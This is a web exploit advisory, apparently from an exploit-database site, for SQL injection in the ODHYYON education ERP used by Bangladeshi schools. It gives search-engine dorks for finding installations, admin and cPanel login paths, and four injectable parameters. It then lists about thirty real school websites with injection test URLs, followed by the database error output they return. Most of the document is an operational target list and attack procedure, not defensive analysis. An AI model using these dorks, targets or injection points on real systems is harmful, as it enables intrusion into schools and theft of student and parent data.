Powered by ODHYYON A product of ADDIE Soft Ltd Bangladesh Education SQL Injection Vulnerability

2018.11.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Powered by ODHYYON A product of ADDIE Soft Ltd Bangladesh Education SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 05/11/2018 # Vendor Homepage : odhyyon.com ~ addiesoft.com # Tested On : Windows and Linux # Category : WebApps # Version Information : v1.16.05.11 - Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.2623.0 # Google Dorks : intext:''Powered by ODHYYON, A product of ADDIE Soft Ltd.'' intext:''Copyright ©2016,ODDHOYON Education ERP, A Product Of ADDIE Soft Ltd.'' inurl:''/PublicSite/Bangla/'' site:edu.bd # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Admin Panel Login Path : oems.DOMAINADRESSHERE.edu.bd admin.DOMAINADRESSHERE.edu.bd/LogIn.aspx mail.DOMAINADRESSHERE.edu.bd:2096 # Student/Parents Portal Login Path : admin.DOMAINADRESSHERE.edu.bd/SPLoginWebPage.aspx # CPanel Admin Login Path : mail.DOMAINADRESSHERE.edu.bd:2096/openid_connect/cpanelid?goto_app= &goto_uri=%2f&parameterized_form=&theme=&user= mail.kgsck.edu.bd:2096/openid_connect/cpanelid?goto_app=&goto_uri= %2f&parameterized_form=&theme=&user= id.cpanel.net/oauth2/authorize?scope=openid+profile+email&state=%7B%22goto_uri%22%3A%22%2F%22%2C%22 external_validation_token%22%3A%22RtGGR0NsOeSgz5mP%22%2C%22goto_app%22%3A%22%22%2C%22 parameterized_form%22%3A%22%22%2C%22action%22%3A%22login%22%2C%22service%22%3A%22webmaild %22%2C%22token_denied%22%3Anull%7D&access_type=offline&redirect_uri=https%3A%2F%2F ip-[WRITE-HERE-WEBSITE-IP-ADDRESS].ip.secureserver.net%3A2083%2F openid_connect_callback%2Fcpanelid&client_id=cpanel.19745557&response_type=code ################################################################################################# # SQL Injection Exploit : /PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=[SQL Injection] /PublicSite/Bangla/News_DescriptionWebForm.aspx?NewsId=[SQL Injection] /PublicSite/Bangla/MessageFromPrincipleWebForm.aspx?TopMenu=[SQL Injection] /RedirectPage.aspx?Url_ID=[SQL Injection] ################################################################################################# # Example Vulnerable Site => [+] glabdhaka.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=4124' [+] zcpsc.edu.bd/PublicSite/Bangla/News_DescriptionWebForm.aspx?NewsId=1%27 [+] apsclschool.edu.bd/PublicSite/Bangla/MessageFromPrincipleWebForm.aspx?TopMenu=1%27 [+] eusc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=6%27 [+] rbhs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=3%27 [+] lalmatiagirlshighschool.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=35%27 [+] vnsc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=3114%27 [+] mgili.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=57%27 [+] uttaramodelcollege.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=2%27 [+] bcsirscd.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] kgsck.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=43%27 [+] tghs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1047%27 [+] jlhs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1048%27 [+] gfsc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=17%27 [+] rcms.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1063%27 [+] bafsk.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=179%27 [+] mmesc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=7%27 [+] bmghs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=13%27 [+] khilgaonghs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=9%27 [+] mmhs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=11%27 [+] mthschool.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=4%27 [+] jusc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=6%27 [+] warihighschool.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] trsc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] imamgazzalisc.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] soshgcdhaka.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] shaheedsmrityhighschool.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] anandamoyeeghs.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] bkspps.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] mgscn.edu.bd/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 [+] oemsbd.com/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=1%27 ################################################################################################# # SQL Database Error : SQL Server Setup Failure : Input string was not in a correct format You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4''' at line 1 Server Error in '/' Application. Object reference not set to an instance of an object. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.NullReferenceException: Object reference not set to an instance of an object. Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below. Stack Trace: [NullReferenceException: Object reference not set to an instance of an object.] EMS_Oddhoyon_Web.PublicSite.Bangla.MessageFromPrincipleWebForm.BindMessage() in F:\Work\APSCLHS Website\OEMS_V2_Web\EMS_Oddhoyon_Web\PublicSite\Bangla\MessageFromPrincipleWebForm.aspx.cs:51 EMS_Oddhoyon_Web.PublicSite.Bangla.MessageFromPrincipleWebForm.Page_Load(Object sender, EventArgs e) in F:\Work\APSCLHS Website\OEMS_V2_Web\EMS_Oddhoyon_Web\PublicSite\Bangla\MessageFromPrincipleWebForm.aspx.cs:45 System.Web.UI.Control.OnLoad(EventArgs e) +102 System.Web.UI.Control.LoadRecursive() +67 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1384 Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.2623.0 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-odhyyon-addie-soft-ltd-bd-edu-sql-inj-exploit.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top